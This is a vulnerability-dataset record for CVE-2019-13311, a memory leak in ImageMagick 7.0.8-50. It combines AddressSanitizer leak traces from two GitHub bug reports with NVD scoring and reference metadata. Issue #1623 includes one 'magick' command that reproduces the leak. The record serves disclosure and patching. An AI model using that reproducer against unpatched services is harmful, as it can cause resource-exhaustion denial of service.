MagickWand/magick-cli.c:477:7 #12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 35 byte(s) in 3 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26 #4 0x7f9c4c593ea1 in CloneSplayTree MagickCore/splay-tree.c:372:43 #5 0x7f9c4c4c8ee3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f9c4c3e9f59 in CloneImage MagickCore/image.c:839:10 #7 0x7f9c4c5e8885 in ExtentImage MagickCore/transform.c:1134:16 #8 0x7f9c4c1c5d00 in CompareImages MagickCore/compare.c:188:20 #9 0x7f9c4bbb06f1 in CLIListOperatorImages MagickWand/operation.c:3880:22 #10 0x7f9c4bbbc35e in CLIOption MagickWand/operation.c:5279:14 #11 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 16 byte(s) in 2 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26 #4 0x7f9c4c593ea1 in CloneSplayTree MagickCore/splay-tree.c:372:43 #5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) Indirect leak of 7 byte(s) in 2 object(s) allocated from: #0 0x4e5397 in __interceptor_malloc (install/bin/magick+0x4e5397) #1 0x7f9c4c438106 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f9c4c43816f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f9c4c5cb9d3 in ConstantString MagickCore/string.c:713:26 #4 0x7f9c4c593f26 in CloneSplayTree MagickCore/splay-tree.c:373:7 #5 0x7f9c4c4698c0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f9c4c3f2018 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f9c4c3e7678 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f9c4c3fee66 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f9c4bbbc163 in CLIOption MagickWand/operation.c:5246:14 #10 0x7f9c4b9fda99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f9c4b9fed0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f9c4ba48ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f9c464bfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: 6613792 byte(s) leaked in 32 allocation(s). ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-23 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
memory leaks is detected at AcquireMagickMemory
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1616/comments
2
2019-06-23T08:45:54Z
2019-07-08T01:55:00Z
https://github.com/ImageMagick/ImageMagick/issues/1616
459,551,673
1,616
500
CVE-2019-13311
2019-07-05T01:15:10.937
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of a wand/mogrify.c error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/4a334bbf5584de37c6f5a47c380a531c8c4b140a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1623" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/bb812022d0bc12107db215c981cab0b1ccd73d91" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/4a334bbf5584de37c6f5a47c380a531c8c4b140a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1623" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/bb812022d0bc12107db215c981cab0b1ccd73d91" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1623
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's memory leaks which are detected at AcquireMagickMemory. This maybe relates with [#1616](https://github.com/ImageMagick/ImageMagick/issues/1616). ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run following cmd: `magick -seed 0 -label "%r%W&%tZRD%r%A" -units PixelsPerCentimeter -caption "%s%m%w" "(" magick:logo +repage ")" "(" magick:granite -shade 13x85 ")" -compress RLE -combine -ift -complex magnitude-phase tmp` Here's Asan Log. ``` ==26664==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121151bb54 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f1211520109 in CloneImage MagickCore/image.c:823:25 #4 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #5 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #6 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #7 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 3686400 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f121156ea36 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f12112b6ede in OpenPixelCache MagickCore/cache.c:3732:46 #3 0x7f12112bd1c1 in GetImagePixelCache MagickCore/cache.c:1756:18 #4 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28 #5 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7 #7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 22616 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f121152153d in CloneImage MagickCore/image.c:879:43 #4 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #5 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #6 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #7 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121151bb54 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f121151e193 in AcquireImageInfo MagickCore/image.c:350:28 #4 0x7f1211526f53 in CloneImageInfo MagickCore/image.c:945:14 #5 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21 #6 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12 #7 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14 #8 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 9152 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f121156ea36 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f12112a11d4 in AcquirePixelCache MagickCore/cache.c:195:28 #3 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28 #4 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29 #5 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28 #6 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10 #7 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 512 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f12115afa4a in AcquirePixelChannelMap MagickCore/pixel.c:101:35 #4 0x7f12115afc24 in ClonePixelChannelMap MagickCore/pixel.c:139:13 #5 0x7f1211520d8f in CloneImage MagickCore/image.c:849:28 #6 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 288 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121127eb74 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f121128064d in CloneBlobInfo MagickCore/blob.c:554:27 #4 0x7f1211521248 in CloneImage MagickCore/image.c:867:25 #5 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #6 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #7 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #8 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #9 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #10 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #11 0x526f95 in MagickMain utilities/magick.c:149:10 #12 0x5268e1 in main utilities/magick.c:180:10 #13 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 192 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f12112a1daf in AcquirePixelCacheNexus MagickCore/cache.c:271:29 #4 0x7f12112a175d in AcquirePixelCache MagickCore/cache.c:212:26 #5 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28 #6 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29 #7 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28 #8 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10 #9 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7 #10 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #11 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #12 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #13 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #14 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #15 0x526f95 in MagickMain utilities/magick.c:149:10 #16 0x5268e1 in main utilities/magick.c:180:10 #17 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 128 byte(s) in 4 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f12116c9dd3 in AddValueToSplayTree MagickCore/splay-tree.c:189:21 #3 0x7f12116cacdc in CloneSplayTree MagickCore/splay-tree.c:372:12 #4 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27 #5 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10 #6 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21 #7 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12 #8 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14 #9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 128 byte(s) in 4 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f12116c9dd3 in AddValueToSplayTree MagickCore/splay-tree.c:189:21 #3 0x7f12116cacdc in CloneSplayTree MagickCore/splay-tree.c:372:12 #4 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25 #5 0x7f1211520999 in CloneImage MagickCore/image.c:839:10 #6 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 115 byte(s) in 4 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26 #4 0x7f12116cacc6 in CloneSplayTree MagickCore/splay-tree.c:373:7 #5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10 #7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f12116cee24 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f12116caeb5 in NewSplayTree MagickCore/splay-tree.c:1148:32 #4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10 #7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f12116cee24 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f12116caeb5 in NewSplayTree MagickCore/splay-tree.c:1148:32 #4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f12116cee24 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10 #3 0x7f12116caeb5 in NewSplayTree MagickCore/splay-tree.c:1148:32 #4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f1211272c4a in CloneImageArtifacts MagickCore/artifact.c:118:24 #6 0x7f12115209ac in CloneImage MagickCore/image.c:840:10 #7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f12112a1ac4 in AcquirePixelCache MagickCore/cache.c:229:25 #4 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28 #5 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29 #6 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28 #7 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10 #8 